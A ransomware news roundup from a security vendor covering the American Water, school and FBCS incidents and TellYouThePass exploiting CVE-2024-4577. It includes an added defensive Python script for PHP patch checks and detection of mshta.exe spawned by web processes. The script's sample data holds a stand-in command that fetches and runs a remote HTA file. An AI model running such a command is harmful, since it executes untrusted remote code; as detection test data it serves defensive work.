Last Week in Ransomware: 10.14.2024

Industry
Written by
Halcyon Team
Published on
Oct 14, 2024

Last week in ransomware news we saw a ransomware attack disrupt the largest water utility in the US, ransomware attacks becoming the new snow days for schools, and the TellYouThePass gang actively exploiting a PHP flaw...

Attack Disrupts Largest Water Utility in US  

American Water, the largest regulated water and wastewater utility in the United States, disclosed that it experienced a cyberattack affecting its billing systems. Serving over 14 million people across 14 states and operating on 18 military installations, the company detected unauthorized activity last Thursday and took immediate action by disconnecting or deactivating certain systems to protect customer data and prevent further harm. Ruben Rodriguez, an American Water spokesperson, confirmed that the company’s water and wastewater operations were not impacted.

American Water is cooperating with law enforcement and conducting a thorough investigation, but has not disclosed which specific systems were affected or the duration of the downtime. While it is unclear whether the incident involved ransomware, the company’s response—shutting down parts of its network—is typical in such scenarios. Customers will not incur late fees while billing systems remain offline.

The attack highlights the vulnerability of critical infrastructure to cyber threats, especially when nation-state actors may be involved. Such incidents blur the line between financially motivated cybercrime and state-sponsored attacks aimed at advancing geopolitical goals. The complexity of attributing these attacks provides plausible deniability for state entities and complicates efforts to mitigate and respond to disruptions targeting essential services.


Ransomware: New Snow Days for Schools  

In early September, Highline Public Schools, a large K-12 district in Washington State serving over 17,500 students, experienced a ransomware attack that forced the temporary closure of all its 34 schools.  

The incident, detected on September 7, led the district to shut down schools and suspend activities while its central office remained open. Highline initiated an investigation with the help of a third-party cybersecurity forensic specialist and notified the FBI, collaborating with state and federal agencies to assess the scope of the breach.  

While it remains unclear if any personal data was compromised, the district is offering a year of free credit and identity monitoring services to all employees as a precautionary measure.

Highline is currently rebuilding its network infrastructure, planning to start re-imaging student and staff devices on October 14. This attack highlights the growing vulnerability of educational institutions to cyber threats.  

Similarly, Charles Darwin School in South London also faced a severe ransomware attack that temporarily closed its doors in September, impacting 1,300 students.

The rising frequency of such incidents has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to update its guidelines for K-12 schools. However, many schools lack the necessary resources to implement these security recommendations effectively, leaving them vulnerable to sophisticated cyber-attacks.  

To combat these threats, the education sector requires increased funding, skilled personnel, and robust cybersecurity programs. Without such investments, schools may continue to experience disruptions akin to “cyber snow days,” placing both education and sensitive data at risk.


TellYouThePass Actively Exploiting PHP Flaw

Researchers have detected active attacks using the TellYouThePass ransomware to exploit a new PHP vulnerability, identified as CVE-2024-4577. This vulnerability surfaced after a recent patch aimed to fix a 12-year-old code execution flaw but inadvertently introduced an authentication bypass.  

Although the PHP development team quickly issued a fix in versions 8.3.8, 8.2.20, and 8.1.29, threat actors acted rapidly, exploiting the flaw before many users could update their systems.

The campaign employs the mshta.exe binary to execute a malicious HTML application, which runs a VBScript to load the ransomware directly into memory during runtime. Researchers uncovered a .NET variant of TellYouThePass that communicates with its command-and-control (C&C) server, encrypting files and demanding a ransom of 0.1 BTC.

The speed of exploitation underscores the growing trend of attackers leveraging automation to target unpatched systems. Organizations are urged to apply the patch for CVE-2024-4577 immediately and enhance defenses with robust antimalware tools and web application firewalls (WAFs).

However, keeping systems up to date is a challenge due to the need for extensive testing and compatibility issues with legacy systems. This complexity, combined with automated tools used by attackers, makes timely patching crucial for preventing ransomware attacks that target security gaps and misconfigurations in enterprise environments.
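As an added example (not code from Halcyon or from the research it summarizes), the following Python script performs the two checks a defender would want after reading this story: it parses `php -v` output and compares the running version against the fixed releases the article lists (8.3.8, 8.2.20, 8.1.29), and it scans process-creation events for mshta.exe being launched by a PHP or web-server process, which is the execution pattern the campaign relies on. The sample events are constructed, the list of parent processes to watch is an assumption, and the handling of branches newer than 8.3 is an assumption rather than something the article states.

```python
"""Two defender-side checks for the CVE-2024-4577 campaign described above.

Added example, not code from Halcyon or the PHP project. The fixed PHP
releases come from the article; the process-creation events are
constructed, and the parent-process list is an assumption.
"""
import re
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]

# Fixed releases named in the article, keyed by (major, minor) branch.
FIXED_VERSIONS: Dict[Tuple[int, int], Version] = {
    (8, 1): (8, 1, 29),
    (8, 2): (8, 2, 20),
    (8, 3): (8, 3, 8),
}
NEWEST_FIXED_BRANCH = max(FIXED_VERSIONS)

_VERSION_RE = re.compile(r"\bPHP (\d+)\.(\d+)\.(\d+)")


def parse_php_version(php_v_output: str) -> Version:
    """Extract (major, minor, patch) from the first line of `php -v` output."""
    m = _VERSION_RE.search(php_v_output)
    if m is None:
        raise ValueError("no 'PHP x.y.z' string found in output")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def needs_cve_2024_4577_patch(version: Version) -> bool:
    """Return True when `version` is older than the fixed release of its branch.

    Branches with no listed fix (8.0 and earlier) are reported as needing
    attention, since no fixed release exists for them. Branches newer than
    8.3 are assumed to have shipped after the fix (assumption, not from
    the article).
    """
    branch = (version[0], version[1])
    if branch > NEWEST_FIXED_BRANCH:
        return False
    fixed = FIXED_VERSIONS.get(branch)
    if fixed is None:
        return True
    return version < fixed


# Parent processes from which an mshta.exe launch is worth alerting on.
# The article names mshta.exe; which parents to watch is our assumption:
# a PHP or web-server worker has no routine reason to start mshta.exe.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_suspicious_mshta(events: List[Dict[str, object]]) -> List[int]:
    """Return ids of events where a web/PHP process spawned mshta.exe.

    Each event is a dict with 'id', 'parent', 'image' and 'cmdline' keys,
    the shape a Sysmon Event ID 1 record reduces to after parsing.
    """
    flagged = []
    for ev in events:
        if (_basename(str(ev["image"])) == "mshta.exe"
                and _basename(str(ev["parent"])) in WEB_PARENTS):
            flagged.append(ev["id"])
    return flagged


# Constructed sample events: one matching the campaign pattern, one benign
# user-launched HTA, one PHP child that is not mshta.exe.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\php\php-cgi.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://hta-host.example/update.hta"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\Desktop\report.hta"},
    {"id": 3, "parent": r"C:\php\php-cgi.exe",
     "image": r"C:\php\php.exe",
     "cmdline": "php.exe -v"},
]

if __name__ == "__main__":
    sample_php_v = "PHP 8.2.19 (cli) (built: May  7 2024 15:06:08) (NTS)"  # constructed
    v = parse_php_version(sample_php_v)
    print(f"PHP {v}: patch needed = {needs_cve_2024_4577_patch(v)}")
    print("suspicious mshta events:", flag_suspicious_mshta(SAMPLE_EVENTS))
```

The version check is deliberately conservative: an unlisted older branch is reported as needing attention rather than silently passed, because the absence of a fixed release is itself the finding. The process rule keys on the parent rather than on the HTA's URL or file name, since those change per campaign while the parent-child relationship does not.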


Ransomware Attack Hits Comcast Customers

A data breach involving Financial Business and Consumer Solutions (FBCS) has impacted several major companies, including Comcast, Truist Bank, and Capio & CF Medical, exposing the personal information of approximately 4 million individuals.  

The breach, which originated in February 2024, initially affected 1.9 million people before the numbers were revised in June. Attackers infiltrated FBCS’s systems, stole sensitive data, and encrypted files in a ransomware attack that went undetected for nearly two weeks.

Among the affected, over 237,700 Comcast customers had sensitive information compromised, such as names, addresses, Social Security numbers, birth dates, and account details.

Notably, the breach impacted Comcast customers who signed up around 2021, despite Comcast no longer utilizing FBCS for debt collection since 2020. Truist Bank and Capio & CF Medical, which use FBCS for debt collection services, were also significantly impacted.

Comcast is offering one year of credit monitoring to affected customers, while FBCS continues to investigate the attack but has not disclosed full details. This incident underscores the vulnerabilities associated with third-party service providers, exposing both organizations and their clients to downstream risks when security measures are insufficient.

Third-party breaches can create a domino effect, impacting all associated organizations due to limited visibility into the third party’s security posture and lack of control over shared data.  

Ransomware operators increasingly exploit third-party compromises to infiltrate additional targets, amplifying the financial and operational damage. This strategy enables attackers to extort both companies and individuals, increasing pressure and potential payouts.

The FBCS breach is a prime example of how ransomware attackers can exploit a single third-party vulnerability to access data from multiple clients, creating widespread repercussions.  

To mitigate these risks, organizations must implement robust third-party risk management strategies, including thorough vendor vetting, continuous security monitoring, and strong contractual agreements.  

Encryption and a coordinated incident response plan are also critical, both to prevent attackers from easily leveraging stolen data for extortion and to reduce the impact of downstream risks.


Halcyon.ai eliminates the business impact of ransomware, drastically reduces downtime, prevents data exfiltration, and enables organizations to quickly and easily recover from attacks without paying ransoms or relying on backups – talk to a Halcyon expert today to find out more. Halcyon also publishes a quarterly RaaS (Ransomware as a Service) and extortion group reference guide, Power Rankings: Ransomware Malicious Quartile, and check out the Recent Ransomware Attacks resource site.
